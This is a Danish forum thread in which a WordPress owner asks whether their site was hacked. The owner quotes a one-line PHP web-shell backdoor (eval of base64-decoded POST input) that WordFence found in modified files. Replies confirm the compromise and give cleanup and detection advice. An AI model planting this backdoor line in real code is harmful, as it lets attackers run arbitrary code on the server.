Debat
|
Jeg har installeret WordFence på min WP side. Jeg har selvfølgelig glemt alt om den og kørte så en scan. Den viser at nogle filer er modificeret. Nogle af dem kan jeg godt gennemskue ændringerne på og de ser rigtige ud. Men andre kan jeg ikke. Der er blandt andet nogle med følgende i: <?php eval(base64_decode($_POST['n353b7d']));?> Er min side blevet hacket ? |
|
Kunne godt lugte lidt af det :/ - men er absolut ikke sikker. Sidst jeg fik en wp "hacket" var med sådan noget kode der :( |
Din side har været "hacket" (hacket er ikke korrekte navn for det, men uden betydning). Du er langt fra den eneste som oplever at ens side er fyldt med kode som den der og det er vigtigt at du får det renset HURTIGT. Jeg har renset 100vis af sådan nogle hackede wordpress sider og ved præcis hvad jeg leder efter, men for en som der ikke ved hvad man leder efter og hvor ma skal lede. Så er det nemmeste at installere wordpress om igen og så bare benytte samme database. (skift koder osv). Det kan sagtens lade sig gøre uden at geninstallere det hele, men tager tid når man ikke har renset en side før. |
|
Glemte lige. Alt som Wordfence finder, brug funktionen "sammenlign" eller hvad den nu hedder, så kan du se hvad der er ændret og om det skal rettes. Wordfence finder ikke alt (plugins og tema skanning er nok slået fra og det er ofte deri sådan noget ligger), men meget finder den. |
Ovenstående gør det muligt at få din webserver til at eksekvere PHP kode som brugeren selv definerer. Dvs. din server kan bruges til alt mulig skidt og data på din server ikke sikre. Send mig en pm eller en mail på ( martin [at] bitmasch [punktum] com) hvis du mangler en til at kigge på det og evt. spore hvordan de er kommet ind. Har gendannet et par inficerede WP sider før. |
Softwareudvikler med speciale indenfor skalerbare webløsninger. PHP, MySQL, Puppet, Python, Apache, nginx, HTML5, m.m.
http://bitmasch.com/
|
Det er umiddelbart ikke så mange sider det er på, så dem kan jeg rette. Men kan der ligge skidt andre steder i systemet, udfra ovenstående, som Wordfence ikke finder ? |
|
Er der andre værktøjer jeg kan bruge til at scanne med ? |
Lav en kopi af din sides filer og hent dem ned til din pc, brug windows til at søge i filerne efter eksempelvis "eval" eller "base64". Du kan nøjes med plugins og tema mapperne, da resten er skannet af wordfence, medmindre du har slået det til at de skannes. Ved ikke lige om nyeste versioner af windows kan søge i filer, men ved ældre kan . Men ellers er der også programer du kan finde til dette. Dit antivirus program kan også være til stor nyttet, skan filerne med dette. Nogle ting kan de faktisk finde. |
http://sitecheck.sucuri.net Udover det er det virkeligt nogen af de bedste, på netop deres marked. Mvh Daniel |
Bliv gratis medlem
Opret bruger